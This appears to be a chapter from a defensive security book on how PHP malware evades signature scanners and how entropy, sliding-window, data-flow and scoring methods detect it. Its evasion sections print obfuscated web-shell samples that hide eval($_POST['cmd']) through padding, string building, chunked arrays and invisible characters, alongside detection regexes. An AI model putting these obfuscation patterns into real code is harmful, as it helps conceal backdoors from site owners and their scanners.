🔒 Hacked
Chapter 5

Beyond signatures: How modern malware evades detection

In Chapter 4, we explored 87 malware signatures. You might think that’s enough to catch most threats. It’s not.

Modern attackers know what security scanners look for. They’ve studied signature databases, analyzed detection algorithms, and developed sophisticated techniques to fly under the radar. This chapter reveals those techniques - and how to defeat them.

The signature problem

Traditional scanners work like this:

1. Load signature database (patterns like "eval(base64_decode(")
2. Read each file
3. Match patterns against content
4. If match found → flag as malware

This approach has a fundamental flaw: attackers can read the same signature databases.
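
The four steps above can be sketched in a few lines of PHP. This is only an illustration, not the scanner from Chapter 4: the function name `scanWithSignatures` and the two-entry signature list are assumptions made for the example. It also shows how little it takes to slip past a fixed pattern.

```php
<?php
// Hypothetical two-entry signature list; a real database holds many more patterns.
$signatures = [
    'eval_base64' => '/eval\s*\(\s*base64_decode\s*\(/i',
    'system_call' => '/\bsystem\s*\(\s*\$_(GET|POST|REQUEST)/i',
];

/**
 * Return the names of all signatures that match the given file content.
 *
 * @param string $content    Raw file content
 * @param array  $signatures Map of signature name => PCRE pattern
 * @return string[]
 */
function scanWithSignatures(string $content, array $signatures): array
{
    $matches = [];
    foreach ($signatures as $name => $pattern) {
        if (preg_match($pattern, $content) === 1) {
            $matches[] = $name;
        }
    }
    return $matches;
}

// The plain form is caught...
$plain = "<?php eval(base64_decode('ZWNobyAiaGFja2VkIjs='));";
// ...but a function name assembled from fragments never matches the pattern.
$built = "<?php \$f = 'bas'.'e64'.'_de'.'code'; \$x = \$f('ZWNobyAiaGFja2VkIjs=');";

var_dump(scanWithSignatures($plain, $signatures)); // one match: eval_base64
var_dump(scanWithSignatures($built, $signatures)); // no matches
```

The scanner only ever sees text, so any rewrite that changes the text without changing the result defeats it.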

💀

The Arms Race

Every public signature database is a roadmap for attackers. For each signature published, attackers develop two new evasion techniques. This is why signature-only scanners are fighting a losing battle.

What Attackers Do

When an attacker wants to evade eval(base64_decode( detection:

// Original (detected)
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));

// Evasion v1: Variable indirection
$f = 'base64_decode';
$e = 'eval';
$e($f('ZWNobyAiaGFja2VkIjs='));

// Evasion v2: String building
$func = 'bas'.'e64'.'_de'.'code';
$exec = 'ev'.'al';
$exec($func('ZWNobyAiaGFja2VkIjs='));

// Evasion v3: Array chunks (defeats even v2 signatures)
$c = ['ZWNo', 'byAi', 'aGFj', 'a2Vk', 'Ijs='];
$f = implode('', array_map('chr', [98,97,115,101,54,52,95,100,101,99,111,100,101]));
$e = implode('', array_map('chr', [101,118,97,108]));
$e($f(implode('', $c)));

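Each version evades more signatures while aiming for the exact same result. The intended behavior is identical; only the appearance is different. (The snippets are simplified for illustration: eval is a language construct rather than a function, so PHP will not invoke it through a variable as written. What matters here is how the telltale strings are hidden from pattern matching.)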


Enter entropy analysis

Entropy is a measure of randomness or unpredictability in data. It’s borrowed from information theory - specifically, Shannon entropy.

- Normal PHP entropy: 4.5-5.5
- Obfuscated code: 5.8+
- Padded/evasion: <4.0

Understanding Entropy Intuitively

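Think of entropy as measuring “surprise”:

Normal PHP code has medium entropy (4.5-5.5 on a 0-8 scale) because it mixes keywords, identifiers, punctuation and whitespace, and a handful of characters occur far more often than the rest.

Base64-encoded malware has high entropy (5.8+) because base64 text draws almost evenly from a 64-character alphabet, which pushes it toward that alphabet's ceiling of 6 bits per character.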

Shannon Entropy Formula
H(X) = -Σ p(x) × log₂(p(x))

Where:

- H(X) = entropy of the data
- p(x) = probability of character x appearing
- Σ = sum over all unique characters

For a file with 256 unique byte values appearing equally:
H = -256 × (1/256 × log₂(1/256)) = 8 bits (maximum entropy)
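
The formula translates almost directly into PHP. The sketch below is one possible way to write a `calculateEntropy` helper; the chapter's own implementation is not shown, so the body here is an assumption. It works on bytes, which is why the scale runs from 0 to 8.

```php
<?php
/**
 * Shannon entropy of a byte string, in bits per byte (0.0 to 8.0).
 */
function calculateEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }

    $entropy = 0.0;
    // count_chars(..., 1) returns only the byte values that actually occur
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $entropy -= $p * log($p, 2);
    }
    return $entropy;
}

// One symbol only: no surprise at all
printf("%.2f\n", calculateEntropy(str_repeat('a', 100)));                         // 0.00
// Four equally likely symbols: 2 bits each
printf("%.2f\n", calculateEntropy('abcdabcdabcdabcd'));                           // 2.00
// All 256 byte values exactly once: the maximum
printf("%.2f\n", calculateEntropy(implode('', array_map('chr', range(0, 255))))); // 8.00
```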

Why Attackers Fear Entropy Scanners

Early entropy scanners caught obfuscated malware easily:

File: malicious.php
Global Entropy: 6.7 (HIGH - SUSPICIOUS)
→ Flag for review

But attackers adapted. They developed entropy evasion techniques - ways to artificially lower their malware’s entropy to look like normal code.


The 5 entropy evasion techniques

Through extensive research, we’ve identified five primary techniques attackers use to manipulate entropy:

| Technique | Method | Effect on Entropy |
|---|---|---|
| Comment Padding | Add voluminous repetitive comments | Lowers global entropy |
| Variable Name Engineering | Use predictable, long variable names | Lowers character diversity |
| Chunked Payload | Split payload into small pieces | Distributes high-entropy regions |
| String Steganography | Hide data in invisible characters | Adds entropy invisibly |
| Whitespace Manipulation | Add excessive whitespace | Dilutes entropy calculation |

Let’s examine each one in detail.


Technique 1: Comment padding

Goal: Dilute high-entropy payload with low-entropy comments.

Comment Padding Evasion MALICIOUS CODE
<?php
/*
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* [... 500 more identical lines ...]
*/

// Configuration settings
// Configuration settings
// Configuration settings

$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($c);

/*
* End of configuration file.
* End of configuration file.
* End of configuration file.
* End of configuration file.
*/

Why it works: The malicious payload is 2 lines. The padding is 1000+ lines of repetitive, low-entropy text. The global entropy of the file drops from 6.5 to 4.8 - appearing normal.

Detection: CommentPaddingDetector

We counter this by comparing entropy with and without comments:

| Indicator | Threshold | What It Means |
|---|---|---|
| Entropy delta | > 1.5 | Big difference with/without comments |
| Comment ratio | > 60% | File is mostly comments |
| Repetition score | > 40% | Same lines repeated |
| Vocabulary ratio | < 15% | Very few unique words |

// Detection logic
$entropyWithComments = calculateEntropy($content);
$entropyWithout = calculateEntropy(stripComments($content));
$delta = $entropyWithout - $entropyWithComments;

if ($delta > 1.5) {
    // Comments are artificially lowering entropy
    // Investigate the non-comment code!
}
ℹ️

Real Detection Numbers

In our implementation, we require at least 2 indicators with combined confidence above 40% before flagging. This prevents false positives on legitimately well-documented code.
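
To make the first two indicators concrete, here is a minimal sketch that strips comments with PHP's tokenizer and then measures the entropy delta and comment ratio. The helper names (`entropyOf`, `stripPhpComments`, `commentPaddingIndicators`) are hypothetical, not the CommentPaddingDetector itself, and the sketch assumes the tokenizer extension is available (it is enabled by default).

```php
<?php
/** Shannon entropy in bits per byte. */
function entropyOf(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $h = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $h -= $p * log($p, 2);
    }
    return $h;
}

/** Remove PHP comments via the tokenizer, so comment markers inside strings are left alone. */
function stripPhpComments(string $source): string
{
    $out = '';
    foreach (token_get_all($source) as $token) {
        if (is_array($token)) {
            if ($token[0] === T_COMMENT || $token[0] === T_DOC_COMMENT) {
                continue; // drop the comment text
            }
            $out .= $token[1];
        } else {
            $out .= $token; // single-character tokens such as ";" or "("
        }
    }
    return $out;
}

/** Compute two of the indicators from the table: entropy delta and comment ratio. */
function commentPaddingIndicators(string $source): array
{
    $stripped = stripPhpComments($source);
    $total = strlen($source);
    return [
        'entropy_delta' => entropyOf($stripped) - entropyOf($source),
        'comment_ratio' => $total > 0 ? 1 - strlen($stripped) / $total : 0.0,
    ];
}

// A padded file in the style of the example above: one code line, 500 comment lines
$padded = "<?php\n/*\n"
        . str_repeat("* This is a legitimate configuration file for the application.\n", 500)
        . "*/\n"
        . "\$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');\n";

$indicators = commentPaddingIndicators($padded);
printf("delta=%.2f ratio=%.0f%%\n", $indicators['entropy_delta'], $indicators['comment_ratio'] * 100);
```

Using the tokenizer rather than a regular expression is a deliberate choice here: a string literal that happens to contain `/*` or `//` is not mistaken for a comment.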


Technique 2: Variable name engineering

Goal: Use predictable, long variable names to lower character diversity.

Variable Name Engineering MALICIOUS CODE
<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
$temporaryDataBufferStorageVariableFour = 'gk';
$temporaryDataBufferStorageVariableFive = 'X1';
$temporaryDataBufferStorageVariableSix = 'BP';
$temporaryDataBufferStorageVariableSeven = 'U1';
$temporaryDataBufferStorageVariableEight = 'Rb';
$temporaryDataBufferStorageVariableNine = 'J2';
$temporaryDataBufferStorageVariableTen = 'Nt';

$resultOutputDataString =
$temporaryDataBufferStorageVariableOne .
$temporaryDataBufferStorageVariableTwo .
$temporaryDataBufferStorageVariableThree .
/* ... continues ... */;

$executionFunctionVariable = 'eval';
$decodeFunctionVariable = 'base64_decode';
$executionFunctionVariable($decodeFunctionVariable($resultOutputDataString));

Why it works: The long, repetitive variable names add predictable characters. Words like “temporary”, “Data”, “Buffer”, “Storage”, “Variable” appear constantly, lowering entropy.

Detection: VariableNameEngineeringDetector

| Indicator | Threshold | What It Means |
|---|---|---|
| Average length | > 25 chars | Unusually long variable names |
| Very long count | > 3 variables over 40 chars | Padding behavior |
| Sequential patterns | > 5 numbered vars | $var1, $var2, $var3… |
| Repetitive affixes | > 40% same suffix/prefix | Same endings/beginnings |

We also look for known padding words. When these words appear repeatedly in variable names, suspicion increases.
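
The raw numbers behind the first three indicators are easy to gather. The sketch below is a simplified illustration, not the VariableNameEngineeringDetector: the function name `variableNameStats` is hypothetical, and treating spelled-out suffixes such as `One` or `Two` as "numbered" is an assumption added for this example. It needs PHP 7.4 or later for arrow functions.

```php
<?php
/**
 * Compute simple variable-name statistics for a PHP source string.
 * Thresholds are left to the caller; this only gathers the raw numbers.
 */
function variableNameStats(string $source): array
{
    // Collect distinct variable names (without the leading "$")
    preg_match_all('/\$([A-Za-z_][A-Za-z0-9_]*)/', $source, $m);
    $names = array_values(array_unique($m[1]));
    if ($names === []) {
        return ['count' => 0, 'average_length' => 0.0, 'very_long' => 0, 'numbered' => 0];
    }

    $lengths = array_map('strlen', $names);

    // Names ending in digits or a spelled-out number suggest $var1, $var2, ... sequences
    $numberSuffix = '/(\d+|One|Two|Three|Four|Five|Six|Seven|Eight|Nine|Ten)$/';
    $numbered = count(array_filter(
        $names,
        fn(string $n): bool => preg_match($numberSuffix, $n) === 1
    ));

    return [
        'count'          => count($names),
        'average_length' => array_sum($lengths) / count($names),
        'very_long'      => count(array_filter($lengths, fn(int $l): bool => $l > 40)),
        'numbered'       => $numbered,
    ];
}

$sample = <<<'SRC'
<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
SRC;

$stats = variableNameStats($sample);
printf("%d names, average length %.1f, %d numbered\n",
    $stats['count'], $stats['average_length'], $stats['numbered']);
```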


Technique 3: Chunked payload distribution

Goal: Break high-entropy payload into small chunks that individually appear normal.

Chunked Payload Attack MALICIOUS CODE
<?php
// Looks like configuration data
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$config[] = 'U1';
$config[] = 'RF';
$config[] = 'J2';
$config[] = 'Nt';
$config[] = 'ZC';
$config[] = 'dd';
$config[] = 'XS';
$config[] = 'k7';

// Reconstruction - the dangerous part
$payload = implode('', $config);
$fn = chr(101).chr(118).chr(97).chr(108); // "eval"
$fn(base64_decode($payload));

Why it works: Each 2-character chunk has low entropy. A sliding window of 256 bytes won’t see a concentrated high-entropy region. The payload is distributed across the file.

Detection: ChunkedPayloadDetector

We look for the reconstruction patterns:

| Pattern | Description | Confidence |
|---|---|---|
| Array building | $arr[] = 'xx'; repeated | 70% |
| implode + eval | Reconstruction into execution | 95% |
| implode + base64_decode | Decoding reconstructed string | 90% |
| chr() chains | Building strings from ASCII | 85% |
| Uniform string lengths | All strings same size | 70% |

// Key detection patterns
$dangerousReconstruction = [
    'base64_chunks' => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building' => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];
🚨

AI Polymorphism Uses This

AI-generated malware heavily uses chunked payloads because each instance can have a different chunk order, different array variable names, and different reconstruction methods. This is why we focus on detecting the reconstruction, not the chunks themselves.
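
As a rough sketch of how these checks might be wired together, the function below applies the three regular expressions from the pattern list and adds two of the table's indicators (array building and uniform string lengths). The function name `chunkedPayloadIndicators` and the minimum run of five appends are assumptions for the example, not values from the ChunkedPayloadDetector.

```php
<?php
/**
 * Look for reconstruction patterns and for runs of uniform short string appends.
 * Returns the list of indicator names that fired.
 */
function chunkedPayloadIndicators(string $source): array
{
    // Patterns taken from the $dangerousReconstruction list above
    $patterns = [
        'base64_chunks'    => '/base64_decode\s*\(\s*implode/',
        'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
        'chr_building'     => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
    ];

    $hits = [];
    foreach ($patterns as $name => $pattern) {
        if (preg_match($pattern, $source) === 1) {
            $hits[] = $name;
        }
    }

    // Array building: $arr[] = 'xx'; repeated. Capture each appended literal.
    preg_match_all('/\$\w+\[\]\s*=\s*\'([^\']*)\'\s*;/', $source, $m);
    $chunks = $m[1];
    if (count($chunks) >= 5) { // assumed minimum run length
        $hits[] = 'array_building';
        // Uniform string lengths: every chunk has the same size
        if (count(array_unique(array_map('strlen', $chunks))) === 1) {
            $hits[] = 'uniform_lengths';
        }
    }
    return $hits;
}

// Build a small chunked sample: six 2-character appends, then a reconstruction call
$appends = implode('', array_map(
    fn(string $c): string => "\$config[] = '$c';\n",
    ['ZX', 'Zh', 'bC', 'gk', 'X1', 'BP']
));
$sample = "<?php\n\$config = [];\n" . $appends . "\$p = base64_decode(implode('', \$config));\n";

print_r(chunkedPayloadIndicators($sample));
```

Note that none of these checks inspect the chunk contents; they only look at how the chunks are assembled, which is the part that stays stable across variants.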


Technique 4: String steganography

Goal: Hide data using invisible Unicode characters or look-alike characters.

Invisible Characters

These Unicode characters are invisible but present in the string:

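| Character | Unicode | Name |
|---|---|---|
| (invisible) | U+200B | Zero Width Space |
| (invisible) | U+200C | Zero Width Non-Joiner |
| (invisible) | U+200D | Zero Width Joiner |
| (invisible) | U+FEFF | Byte Order Mark |
| (invisible) | U+00AD | Soft Hyphen |
| (invisible) | U+2060 | Word Joiner |

Invisible Character Encoding MALICIOUS CODE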
<?php
// Looks like a normal string, but contains hidden data
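// (the invisible characters are written as \u{...} escapes here so they can be seen)
$message = "Hello\u{200B}\u{200C}\u{200D}\u{200B}\u{200B}\u{200C}\u{200C}\u{200B}World";  // ZWSP patterns encode binary

// Decoder extracts binary from invisible char positions
$binary = '';
$length = mb_strlen($message, 'UTF-8');  // count characters, not bytes
for ($i = 0; $i < $length; $i++) {
  $char = mb_substr($message, $i, 1, 'UTF-8');
  if ($char === "\u{200B}") $binary .= '0';  // Zero Width Space
  if ($char === "\u{200C}") $binary .= '1';  // Zero Width Non-Joiner
}
// $binary could be: "01001000" = 'H' = start of payload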

Homoglyphs

Characters from different scripts that look identical:

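| Latin | Cyrillic | They Look The Same |
|---|---|---|
| a | а (U+0430) | Yes |
| e | е (U+0435) | Yes |
| o | о (U+043E) | Yes |
| c | с (U+0441) | Yes |
| p | р (U+0440) | Yes |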

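An attacker could write еval (Cyrillic ‘е’) instead of eval (Latin ‘e’). Signature scanners looking for eval won’t match, and a human reviewer will read it as eval. PHP, however, treats it as a different identifier, so it only runs if the attacker has defined a function under the look-alike name.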

Detection: StringSteganographyDetector

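We scan for the invisible characters listed above and for identifiers that mix Latin letters with look-alike characters from other scripts.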
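
A minimal sketch of both checks, using PCRE's Unicode support. The function name `steganographyIndicators` is hypothetical, and restricting the homoglyph check to Latin and Cyrillic is a simplification for this example; the StringSteganographyDetector itself is not shown in this chapter.

```php
<?php
/**
 * Report invisible code points and mixed Latin/Cyrillic words in a UTF-8 string.
 */
function steganographyIndicators(string $source): array
{
    $findings = [];

    // The six invisible code points from the table above
    $invisible = '/[\x{200B}\x{200C}\x{200D}\x{FEFF}\x{00AD}\x{2060}]/u';
    $count = preg_match_all($invisible, $source);
    if ($count > 0) {
        $findings['invisible_characters'] = $count;
    }

    // A single word that mixes Latin and Cyrillic letters is a typical homoglyph tell
    if (preg_match_all('/[\p{Latin}\p{Cyrillic}]+/u', $source, $m)) {
        $mixed = array_filter($m[0], fn(string $w): bool =>
            preg_match('/\p{Latin}/u', $w) === 1 && preg_match('/\p{Cyrillic}/u', $w) === 1);
        if ($mixed !== []) {
            $findings['mixed_script_words'] = array_values(array_unique($mixed));
        }
    }
    return $findings;
}

$hidden    = "Hello\u{200B}\u{200C}World"; // two zero-width characters between the words
$lookalike = "\u{0435}val";                // Cyrillic U+0435 followed by Latin "val"

print_r(steganographyIndicators($hidden));
print_r(steganographyIndicators($lookalike));
```

One caveat: a single U+FEFF at the very start of a file is usually just a byte order mark left by an editor, so a real detector would likely treat that position differently.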


Technique 5: Whitespace manipulation

Goal: Pad file with whitespace to dilute entropy.

Whitespace Padding MALICIOUS CODE
<?php

eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

                                                          

Why it works: Whitespace is low-entropy because it consists of only a few distinct characters (space, tab, newline) repeated over and over. Padding a file until it is 90% whitespace drops its global entropy significantly.

Detection: WhitespaceManipulationDetector

| Indicator | Threshold | Meaning |
|---|---|---|
| Whitespace ratio | > 40% | File is mostly whitespace |
| Entropy delta | > 2.0 | Big difference with/without whitespace |
| Blank line ratio | > 30% | Too many empty lines |
| Consecutive blanks | > 10 | Suspicious padding |
| Low entropy regions | > 3 windows | Concentrated whitespace areas |
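
Three of these indicators need nothing more than counting. The sketch below gathers them; the function name `whitespaceStats` is hypothetical, and comparing the results against the thresholds in the table is left to the caller.

```php
<?php
/**
 * Gather whitespace statistics for a file's content.
 */
function whitespaceStats(string $content): array
{
    $total = strlen($content);
    if ($total === 0) {
        return ['whitespace_ratio' => 0.0, 'blank_line_ratio' => 0.0, 'max_consecutive_blank' => 0];
    }

    // Count spaces, tabs, carriage returns and newlines
    $whitespace = preg_match_all('/[ \t\r\n]/', $content);

    $lines = explode("\n", $content);
    $blank = 0;   // total blank lines
    $run = 0;     // length of the current run of blank lines
    $maxRun = 0;  // longest run seen so far
    foreach ($lines as $line) {
        if (trim($line) === '') {
            $blank++;
            $run++;
            $maxRun = max($maxRun, $run);
        } else {
            $run = 0;
        }
    }

    return [
        'whitespace_ratio'      => $whitespace / $total,
        'blank_line_ratio'      => $blank / count($lines),
        'max_consecutive_blank' => $maxRun,
    ];
}

// One line of code followed by 20 empty lines and 200 trailing spaces
$padded = "<?php\n" . "echo 1;\n" . str_repeat("\n", 20) . str_repeat(' ', 200);
$stats = whitespaceStats($padded);
printf("whitespace=%.0f%% blank lines=%.0f%% longest blank run=%d\n",
    $stats['whitespace_ratio'] * 100, $stats['blank_line_ratio'] * 100, $stats['max_consecutive_blank']);
```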

The power of sliding window analysis

Global entropy can be manipulated. Local entropy is harder to fake.

Sliding window analysis divides a file into overlapping chunks and measures each one’s entropy:

File: malicious_padded.php (10000 bytes)

Sliding Window Configuration:
- Window size: 256 bytes
- Step: 64 bytes
- Windows analyzed: ~155

Results:
Window 0-256:    Entropy 3.2 (comments/padding)
Window 64-320:   Entropy 3.4 (comments/padding)
Window 128-384:  Entropy 3.5 (comments/padding)
...
Window 4096-4352: Entropy 6.8 ← ANOMALY! Hidden payload
Window 4160-4416: Entropy 6.7 ← ANOMALY!
...
Window 9800-10000: Entropy 3.1 (comments/padding)

Global Entropy: 4.2 (appears normal)
But: Local anomalies detected at byte 4096-4500

The global entropy looks normal (4.2), but the sliding window reveals a high-entropy region in the middle - that’s where the malicious payload is hidden.
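
The window loop itself is short. Here is a minimal sketch using the 256-byte window and 64-byte step from the configuration above; the function names are hypothetical, and the synthetic input (low-entropy padding around a block of 256 distinct bytes) is chosen only so the result is easy to reason about.

```php
<?php
/** Shannon entropy in bits per byte. */
function windowEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $h = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $h -= $p * log($p, 2);
    }
    return $h;
}

/**
 * Entropy of each overlapping window.
 * Returns a list of ['offset' => int, 'entropy' => float] entries.
 */
function slidingWindowEntropies(string $content, int $windowSize = 256, int $step = 64): array
{
    $windows = [];
    $length = strlen($content);
    // Only full windows are measured; a file shorter than one window yields a single partial one
    $lastStart = max(0, $length - $windowSize);
    for ($offset = 0; $offset <= $lastStart; $offset += $step) {
        $windows[] = [
            'offset'  => $offset,
            'entropy' => windowEntropy(substr($content, $offset, $windowSize)),
        ];
    }
    return $windows;
}

// 4096 bytes of padding, 256 distinct bytes, 4096 bytes of padding
$highEntropy = implode('', array_map('chr', range(0, 255)));
$content = str_repeat('a', 4096) . $highEntropy . str_repeat('a', 4096);

$windows = slidingWindowEntropies($content);

// Pick the window with the highest entropy
$peak = array_reduce(
    $windows,
    fn(?array $best, array $w): ?array => ($best === null || $w['entropy'] > $best['entropy']) ? $w : $best
);
printf("%d windows, peak entropy %.2f at offset %d\n", count($windows), $peak['entropy'], $peak['offset']);
```

The overlap matters: with a step smaller than the window, a payload that straddles a window boundary still lands almost entirely inside at least one window.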

Z-Score Anomaly Detection

We use statistical z-scores to find outliers:

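// Calculate mean and standard deviation of all window entropies
// ($windows is a list of ['entropy' => float, ...] entries)
$windowEntropies = array_column($windows, 'entropy');
$count = count($windowEntropies);
$mean = array_sum($windowEntropies) / $count;
$variance = array_sum(array_map(fn($e) => ($e - $mean) ** 2, $windowEntropies)) / $count;
$stdDev = sqrt($variance);

// Any window more than 2 standard deviations from mean is anomalous
foreach ($windows as $window) {
    // Guard against division by zero when every window has the same entropy
    $zScore = $stdDev > 0 ? abs($window['entropy'] - $mean) / $stdDev : 0.0;
    if ($zScore > 2.0) {
        // This region is statistically abnormal
        flagAsAnomaly($window);
    }
}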

Behavioral analysis: The future

Signatures tell us what code looks like. Behavioral analysis tells us what code does.

✅

The Key Insight

No matter how an attacker obfuscates eval($_POST['cmd']), the behavior is the same: user input flows to a code execution function. We should detect the flow, not the appearance.

Data Flow Tracking

Instead of pattern matching, we track how data moves:

User Input Source        →  Transformation  →  Dangerous Sink
─────────────────────────────────────────────────────────────
$_GET['x']               →  base64_decode   →  eval()
$_POST['data']           →  decrypt()       →  unserialize()
$_REQUEST['cmd']         →  (none)          →  system()
$_COOKIE['token']        →  gzinflate()     →  assert()

If data flows from any user input to any dangerous sink, we flag it - regardless of how the code looks.
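
To give a feel for the idea, here is a deliberately naive taint tracker. It is a sketch under heavy assumptions, not the behavioral engine described here: it handles only straight-line code, splits statements on semicolons, tracks simple `$x = ...` assignments, and does not resolve variable function names. The function name `findTaintedSinks` and the short sink list are hypothetical. A production analyzer would work on a parsed syntax tree instead.

```php
<?php
/**
 * Very simplified taint tracking over straight-line PHP code.
 * Returns the names of dangerous sinks that receive user-controlled data.
 */
function findTaintedSinks(string $source): array
{
    $sources = '/\$_(GET|POST|REQUEST|COOKIE)\b/';
    $sinks = ['eval', 'assert', 'system', 'unserialize'];
    $tainted = [];   // variable names known to carry user input
    $findings = [];

    // True if the expression mentions a superglobal or an already tainted variable
    $isTainted = function (string $expr) use ($sources, &$tainted): bool {
        if (preg_match($sources, $expr) === 1) {
            return true;
        }
        preg_match_all('/\$(\w+)/', $expr, $m);
        return array_intersect($m[1], $tainted) !== [];
    };

    // Naive statement split; it breaks on ";" inside strings, which is acceptable for a sketch
    foreach (explode(';', $source) as $statement) {
        // Propagate taint through simple assignments: $x = <expr>
        if (preg_match('/\$(\w+)\s*=(?!=)(.*)/s', $statement, $m) === 1 && $isTainted($m[2])) {
            $tainted[] = $m[1];
        }
        // Flag any sink whose argument list is tainted
        foreach ($sinks as $sink) {
            if (preg_match('/\b' . $sink . '\s*\((.*)\)/s', $statement, $m) === 1 && $isTainted($m[1])) {
                $findings[] = $sink;
            }
        }
    }
    return array_values(array_unique($findings));
}

// Input flows through two variables and a decoder before reaching the sink
$indirect = '<?php $a = $_GET["x"]; $b = base64_decode($a); eval($b);';
// Same sink, but the argument is a constant string
$harmless = '<?php $a = "ls"; system($a);';

print_r(findTaintedSinks($indirect)); // the eval call is flagged
print_r(findTaintedSinks($harmless)); // nothing is flagged
```

Renaming `$a` and `$b`, or swapping the decoder, changes nothing in the result, which is the property the table above is getting at.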

Why This Defeats AI Polymorphism

AI-generated malware changes its appearance every 15-60 seconds.

But the behavior stays the same. The malware still needs to:

  1. Receive attacker commands (input)
  2. Execute those commands (sink)

Behavioral analysis catches every variant.


Weighted scoring: Combining everything

No single technique is perfect. We combine multiple signals:

| Component | Weight | What It Measures |
|---|---|---|
| Signature matches | 35% | Known malware patterns |
| Behavioral analysis | 25% | Data flow to dangerous sinks |
| Entropy analysis | 15% | Statistical anomalies |
| Structural analysis | 10% | Code structure oddities |
| Context analysis | 15% | File location, naming |

Context Modifiers

Not all detections are equal. We adjust scores based on context:

| Context | Modifier | Reason |
|---|---|---|
| vendor/ | -40% | Third-party code, expected patterns |
| storage/framework/views/ | -50% | Compiled Blade templates |
| bootstrap/cache/ | -45% | Framework cache files |
| public/uploads/ | +40% | PHP shouldn’t be here |
| .hidden/ | +35% | Suspicious directory |
| Random filename | +20% | x7kd92.php is suspicious |

Confidence Thresholds

Based on final score, we recommend actions:

| Confidence | Action | Automated? |
|---|---|---|
| ≥ 85% | QUARANTINE - Move to isolation, alert admin | Yes |
| 65-84% | REVIEW - Flag for manual inspection | No |
| 40-64% | MONITOR - Add to watchlist | No |
| < 40% | CLEAN - No action needed | - |
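
Put together, the weights, modifiers and thresholds amount to a small calculation. The sketch below is one way to express it; the function name `scoreFile` and the component keys are hypothetical. It also makes one loud assumption: a context modifier is applied as relative scaling, so -40% multiplies the weighted score by 0.60. The text does not say whether modifiers are relative or absolute, so treat that choice as illustrative.

```php
<?php
/**
 * Combine per-component confidences (0-100) into a final score and action.
 * Assumption: the context modifier scales the weighted score relatively,
 * e.g. -0.40 multiplies it by 0.60.
 */
function scoreFile(array $components, float $contextModifier = 0.0): array
{
    // Weights from the component table
    $weights = [
        'signature'  => 0.35,
        'behavioral' => 0.25,
        'entropy'    => 0.15,
        'structural' => 0.10,
        'context'    => 0.15,
    ];

    $score = 0.0;
    foreach ($weights as $name => $weight) {
        $score += $weight * ($components[$name] ?? 0.0);
    }

    // Apply the context modifier and clamp to the 0-100 range
    $score = max(0.0, min(100.0, $score * (1 + $contextModifier)));

    // Map the score to the recommended action
    if ($score >= 85) {
        $action = 'QUARANTINE';
    } elseif ($score >= 65) {
        $action = 'REVIEW';
    } elseif ($score >= 40) {
        $action = 'MONITOR';
    } else {
        $action = 'CLEAN';
    }
    return ['score' => $score, 'action' => $action];
}

// Made-up component confidences for illustration; the weighted sum is 76
$signals = ['signature' => 90, 'behavioral' => 80, 'entropy' => 70, 'structural' => 50, 'context' => 60];

echo scoreFile($signals)['action'], "\n";         // REVIEW
echo scoreFile($signals, 0.40)['action'], "\n";   // QUARANTINE (public/uploads/)
echo scoreFile($signals, -0.40)['action'], "\n";  // MONITOR (vendor/)
```

The same signals lead to three different recommendations depending on where the file lives, which is the point of the context modifiers.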

The 15-dimensional feature vector

For advanced analysis, we compute 15 statistical features:

They fall into five groups:

- Entropy features (3)
- Character distribution (4)
- Code metrics (3)
- String analysis (2)
- Function analysis (3)

This 15-dimensional vector provides a fingerprint of the file that’s difficult to manipulate without changing actual behavior.


Practical implementation

Here’s how our detection pipeline works:

Input: suspicious.php
         │
         ▼
┌─────────────────────────────┐
│  1. Quick Filters           │  Skip: >1MB, non-PHP, vendor/
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  2. Signature Scan          │  87 patterns from Chapter 4
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  3. Entropy Analysis        │  5 evasion detectors
│  ├─ CommentPadding          │
│  ├─ VariableNameEngineering │
│  ├─ ChunkedPayload          │
│  ├─ StringSteganography     │
│  └─ WhitespaceManipulation  │
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  4. Behavioral Analysis     │  Data flow tracking
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  5. Weighted Scoring        │  Combine all signals
│  + Context Modifiers        │  Adjust for location
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  6. Recommendation          │  QUARANTINE/REVIEW/MONITOR/CLEAN
└─────────────────────────────┘

Summary

Signatures are necessary but insufficient. Modern malware uses sophisticated evasion techniques. This chapter covered:

- 5 evasion techniques
- 15 statistical features

Key takeaways:

  1. Comment padding, variable engineering, and whitespace manipulation artificially lower entropy
  2. Chunked payloads distribute high-entropy content across the file
  3. String steganography hides data in invisible characters
  4. Sliding window analysis catches local anomalies even when global entropy looks normal
  5. Behavioral analysis detects what code does, not what it looks like
  6. Weighted scoring combines multiple signals for accurate detection
  7. Context modifiers prevent false positives in legitimate framework code

The lesson is clear: layers of defense, not single techniques.


Next: Chapter 6 - The 12 CVEs Every Laravel Developer Must Know

Entropy analysis catches obfuscation. But what about vulnerabilities in Laravel itself? The next chapter covers the critical CVEs every Laravel developer must patch.